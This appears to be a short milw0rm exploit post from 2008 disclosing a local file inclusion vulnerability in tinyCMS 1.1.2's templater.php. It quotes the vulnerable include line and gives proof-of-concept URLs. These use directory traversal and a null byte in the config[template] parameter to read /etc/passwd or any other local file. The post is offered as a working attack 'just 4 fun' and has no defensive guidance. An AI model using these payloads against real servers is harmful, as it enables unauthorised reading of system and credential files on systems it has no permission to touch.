30 lines
No EOL
1 KiB
Text
30 lines
No EOL
1 KiB
Text
########################################################################################
|
|
#
|
|
# Name : tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability
|
|
# Author : cOndemned [ Dark-Coders ]
|
|
# Greetz : Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z
|
|
# Conditions : Magic quotes gpc = Off / Register Globals = On
|
|
# Other info : Prior versions probably are vulnerable too
|
|
#
|
|
########################################################################################
|
|
|
|
Source of /modules/ZZ_Templater/templater.php
|
|
|
|
[ ... ]
|
|
|
|
17. $ftemplatedir = 'templates/'.$config['template'].'/';
|
|
18. include('templates/'.$config['template'].'/data.php'); // <--- LFI
|
|
19. if($tdata['useblocks'] == 1)
|
|
|
|
[ ... ]
|
|
|
|
|
|
Proof of Concept :
|
|
|
|
http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
|
|
http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00
|
|
|
|
|
|
Jusf 4 fun
|
|
|
|
# milw0rm.com [2008-08-21] |